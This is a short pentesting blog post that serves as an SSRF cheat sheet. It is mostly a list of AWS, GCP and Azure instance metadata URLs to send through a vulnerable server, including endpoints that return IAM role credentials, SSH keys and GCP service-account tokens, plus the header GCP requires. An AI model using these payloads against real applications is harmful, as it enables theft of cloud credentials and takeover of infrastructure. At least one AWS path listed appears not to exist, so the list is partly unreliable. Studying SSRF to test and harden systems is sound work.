Learn Pentesting like a Pro!

Share this post

SSRF cheat sheet for AWS, GCP and Azure

pentesting.academy

SSRF cheat sheet for AWS, GCP and Azure

pentesting.academy
Feb 6, 2023
Share

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed.

Source: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

green and white electric device
Photo by Kirill Sh on Unsplash

If a cloud app is vulnerable to SSRF you can read valuable infrastructure info, below the most useful URLs sorted by provider:

AWS

  • http://169.254.169.254/latest/user-data

  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/ami-id

  • http://169.254.169.254/latest/meta-data/reservation-id

  • http://169.254.169.254/latest/meta-data/hostname

  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

  • http://169.254.169.254/latest/meta-data/

  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/

  • http://metadata/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/instance/id

  • http://metadata.google.internal/computeMetadata/v1/instance/region

  • http://metadata.google.internal/computeMetadata/v1/instance/zone

  • http://metadata.google.internal/computeMetadata/v1/project/project-id

  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/

  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.

Share
Comments
Top
New

No posts

Ready for more?

© 2023 pentesting.academy
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great writing